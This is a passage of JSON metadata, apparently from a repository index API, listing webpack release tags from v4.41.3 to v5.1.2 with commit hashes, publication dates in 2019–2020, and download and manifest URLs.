67d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3"